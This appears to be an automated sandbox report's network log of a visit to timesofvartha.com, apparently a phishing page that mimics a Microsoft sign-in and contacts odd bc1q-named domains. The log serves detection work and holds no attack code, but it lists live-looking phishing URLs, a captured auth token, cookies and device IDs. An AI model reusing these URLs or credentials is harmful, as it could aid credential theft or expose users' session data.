    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ePsK7ZCVA7dfvLb&MD=7twsYf23 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET /ajax/libs/jquery/3.6.0/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://timesofvartha.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bc1qlpk73pgj3dz02nq8d9kpdxk.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/jquery/3.6.0/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /api/v3/auth HTTP/1.1Host: bc1qcr8muz00d2v7uqg5ggulrmm.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/converged.v2.login.min_ziytf8dzt9eg1s6-ohhleg2.css HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://timesofvartha.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://timesofvartha.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://timesofvartha.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://timesofvartha.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://timesofvartha.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/converged.v2.login.min_8owwt4u-33ps0wawi7tmow2.css HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://timesofvartha.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
    Source: global trafficHTTP traffic detected: GET /client/config?cc=CH&setlang=en-CH HTTP/1.1X-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateAccept-Encoding: gzip, deflateX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-UserAgeClass: UnknownX-BM-Market: CHX-BM-DateFormat: dd/MM/yyyyX-Device-OSSKU: 48X-BM-DTZ: -300X-DeviceID: 01000A41090080B6X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Search-TimeZone: Bias=300; StandardBias=0; TimeZoneKeyName=Eastern Standard TimeX-BM-Theme: 000000;0078d7X-Search-RPSToken: t%3DEwDoAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAATKroDVehIwhR1af/NJXyEM/gWDmFHEyD/jvuxhb%2BEp%2BvftiDzLladduscq70ZpGhopdhEZ8qqmoHfIbPOSm0ugw3lhj3wJ9chhQzLUzuVkc/Fsc2Fy3cEeW6nFt1DjKEUSbAuArYcH8K2VpTtXi2iJT6WF5QLWupR1oI4/nrOgYjw%2B9EN2UiNbSRpRi%2BlbNvKOnMP/AM%2B7wbBEXXZQLov3CC4Z6plGqpD7kQ/JHTc5EilGf3jFWO9ofEF2EPhUhqWfv0vrT1fCOfdh9h%2BnJMHjCmEDgPxB8uuh7BhVOFIOqYB5jYNhlUhOn5cy9jVnPEnvlpoOXPtxV84wBnGKRN6cQZgAAEKEhzTaRKODLtvfk2V6x70awAfoXS%2B/EnknHIyjanr7q%2BqrhDuk1eZ9nmn4HYONYzsNp75mJcyWN8CSnrDfyY9Bf3/5G6g/2y/PoEhM3Mg6PrSSlp6b4xSGekoRRKMyg0mxmfFf6K9/sllXbk0OR%2BKJhIO75x/dN0VV8RJK49YbrzDdJgHVIMRVQerFapfmGjFlFhK3E2EDXlEHMhQg1RYAhYLVKCgyt%2BlKfghtuKQSAIooXLBtvLi4LlebYYU%2B36jXpwsyXlwwkt1kRcfXmHdbCO6XcIejtQXK5hc%2BSYoSMblBpUpTShzH%2BEJXK8TqRTWQLYCdwaWftz20paj9xV/53ph4ErasRw3SW3570tH8t532O/rga5AQC1t69EmmngayDOJDGqI2WO8wmCsTE9UBxM6yAZtppKFIye/AyxXV9BTrIcfIWGQcB2wbj1wDU6T2SoNuXaWtos7dhf5M6H7kPNMy20sk0MqwiVeTRckXXNudmkZrpoD/Gk0U0tmhkBZskAw7f37X/BH%2BO1usxb2rHrYIdTNvDyH1p9MnfuNKBlnnOZdkkQRSkVigT4%2BHGUtmSZzwY0OLBh9LdRj7kdV14l9oB%26p%3DX-Agent-DeviceId: 01000A41090080B6X-BM-CBT: 1731948986User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045X-Device-isOptin: falseAccept-language: en-GB, en, en-USX-Device-Touch: falseX-Device-ClientSession: 67B87F79F7DB4D5D925739CF3A7A9AADX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIHost: www.bing.comConnection: Keep-AliveCookie: SRCHUID=V=2&GUID=C4EAB6C130004333A34B5668AE4E4D10&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=en; MUID=4590362BB5CF472B95BBEDB3112D4B7B; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
    Source: global trafficHTTP traffic detected: GET /auth-signin-apibridge_481736uyg7y73hdui21/ HTTP/1.1Host: timesofvartha.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://timesofvartha.com/cloudflare-challenge/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-Modified-Since: Thu, 14 Nov 2024 13:43:20 GMT
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bc1qlpk73pgj3dz02nq8d9kpdxk.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /api/v3/auth HTTP/1.1Host: bc1qv5p8dwc98n3judrczkmpkjz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: fp.msedge.netConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /apc/trans.gif?0fc259c7de35075dbd9af6fd5d2875fc HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: wac-ring-fallback.msedge.netConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /apc/trans.gif?46f04eb983746b06c882a75823505167 HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: wac-ring-fallback.msedge.netConnection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: r.neurotags.net
    Source: global trafficDNS traffic detected: DNS query: sepedatua.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: timesofvartha.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: bc1qlpk73pgj3dz02nq8d9kpdxk.org
    Source: global trafficDNS traffic detected: DNS query: bc1qcr8muz00d2v7uqg5ggulrmm.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
    Source: global trafficDNS traffic detected: DNS query: bc1qv5p8dwc98n3judrczkmpkjz.com
    Source: global trafficDNS traffic detected: DNS query: passwordreset.microsoftonline.com
    Source: global trafficDNS traffic detected: DNS query: ajax.aspnetcdn.com
    Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 16:55:50 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 22:06:31 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 16:55:53 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: ZNmd9tj5k8Rbt3a67IwVYjty2/ijv/tc7OQ=$E9u5z8yzrOSODwFKServer: cloudflareCF-RAY: 8e497d9fcdc4485f-DFWalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 16:55:57 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: sQdPlVolUZWPsIUQkYK9hw0iSOpZytk4aj4=$dGb2SmUqG5RJlwkrServer: cloudflareCF-RAY: 8e497db89c316c52-DFWalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 16:56:00 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 22:06:31 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 16:56:00 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: KSYgPJKDba2NVR+cQCb4Li4Z+h92amjZTgc=$KTl6df4IUzZfuPs5Server: cloudflareCF-RAY: 8e497dcdb8c6e905-DFWalt-svc: h3=":443"; ma=86400
    Source: chromecache_285.13.drString found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
    Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
    Source: chromecache_280.13.drString found in binary or memory: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#
    Source: chromecache_283.13.drString found in binary or memory: https://timesofvartha.com/cloudflare-challenge/#
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
    Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
    Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
